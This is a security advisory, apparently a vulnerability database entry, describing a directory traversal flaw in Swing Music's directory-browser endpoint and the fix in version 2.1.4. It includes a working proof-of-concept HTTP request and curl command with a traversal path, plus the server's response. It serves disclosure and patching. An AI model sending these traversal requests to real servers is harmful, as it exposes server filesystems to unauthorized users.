VDB
KO

PYSEC-2026-1947

Swing Music has a Directory Traversal & Filesystem can be accessed by a non-admin user

Details

### Summary Swing Music's `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem.

### Details The `@api.post("/dir-browser")` endpoint lacks proper path validation and authorization checks: - **No authorization requirement**: Any authenticated user can access the endpoint - **Improper path handling**: The code attempts to prepend "/" to non-existent paths but this doesn't prevent traversal: ```python req_dir = pathlib.Path("../../../../etc") # → PosixPath('../../../../etc') if not req_dir.exists(): # → False req_dir = "/" / req_dir # → PosixPath('/../../../../etc') ```

### PoC 1. Create a non-admin user 2. Authenticate as a non-admin user 3. Send the following request: ``` POST /folder/dir-browser HTTP/1.1 Host: IP:1970 Content-Type: application/json Cookie: access_token_cookie=non-admin-access-token Connection: keep-alive

{"folder":"/music/../proc/self/", "tracks_only":false} ``` ```bash curl --path-as-is -i -s -k -X $'POST' -H $'Content-Type: application/json' -b $'access_token_cookie=non-admin-access-token' \ --data-binary $'{\"folder\":\"/music/../proc/self/\", \"tracks_only\":false}' \ $'http://IP:1970/folder/dir-browser' ``` 4. The response will list directories from `/proc/self` instead of restricting to user-accessible paths: ``` HTTP/1.1 200 OK Content-Type: application/json Content-Length: 466 Vary: Accept-Encoding Connection: Keep-Alive

{"folders":[{"name":"attr","path":"/music/../proc/self/attr"},{"name":"cwd","path":"/music/../proc/self/cwd"},{"name":"fd","path":"/music/../proc/self/fd"},{"name":"fdinfo","path":"/music/../proc/self/fdinfo"},{"name":"map_files","path":"/music/../proc/self/map_files"},{"name":"net","path":"/music/../proc/self/net"},{"name":"ns","path":"/music/../proc/self/ns"},{"name":"root","path":"/music/../proc/self/root"},{"name":"task","path":"/music/../proc/self/task"}]} ```

### Impact

**Information Disclosure:** - Server filesystem structure and layout - Configuration file locations and names - User account names from directory listings - Software versions and installed packages - Log file locations and system paths

**Additional Risks:** - Preparation for further attacks (LFI, RCE) - Bypass of access control mechanisms - Exposure of sensitive directory structures

Are you affected?

Enter the version of the package you're using.

Affected packages

PyPI / swingmusic
Introduced in: 0 Fixed in: 2.1.4
Fix pip install --upgrade 'swingmusic>=2.1.4'

References